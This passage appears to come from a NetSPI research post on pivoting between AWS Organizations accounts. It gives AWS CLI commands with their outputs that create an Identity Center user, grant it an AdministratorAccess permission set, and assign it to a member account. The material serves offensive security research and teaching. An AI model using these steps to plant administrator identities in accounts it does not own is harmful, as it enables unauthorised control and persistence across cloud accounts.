# IAM Access Analyzer Example Workflow

# Get instance ID

└─$ aws sso-admin list-instances --profile Orchestrator --region us-west-2
{
    "Instances": [
        {
            "InstanceArn": "arn:aws:sso:::instance/ssoins-7907a1fb914efa94",
            "IdentityStoreId": "d-92676f572a"
        }
    ]
}

# Create user. Note password is not returned via CLI and one needs to either get it from the UI via “Reset Password” on the new user or have the OTP auto-email setting configured.

└─$ aws identitystore create-user --profile Orchestrator --region us-west-2 --identity-store-id "d-92676f572a" --name "Formatted=FormattedValue,GivenName=GivenNameValue,FamilyName=FamilyNameValue" --user-name "Username" --display-name "TEST" --emails "Value=[REDACTED]@gmail.com,Type=Work,Primary=True"
{
    "UserId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
    "IdentityStoreId": "d-92676f572a"
}

# Create Permission Set

└─$ aws sso-admin create-permission-set --name "PermissionSetOne" --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --session-duration "PT12H" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}
└─$ aws sso-admin attach-managed-policy-to-permission-set --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}

# Attach permission set and user to account. Check status of provision.

└─$ aws sso-admin create-account-assignment --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --target-id "[REDACTED]6" --target-type "AWS_ACCOUNT" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --principal-type "USER" --principal-id "d81153b0-9051-709f-f49e-b6d9ec91f892" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "IN_PROGRESS",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892"
    }
}
└─$ aws sso-admin describe-account-assignment-creation-status --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --account-assignment-creation-request-id "c6f6afee-efd2-4cad-a52e-58d937184b52" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "SUCCEEDED",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
        "CreatedDate": "2022-12-18T19:57:22.335000-05:00"
    }
}

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>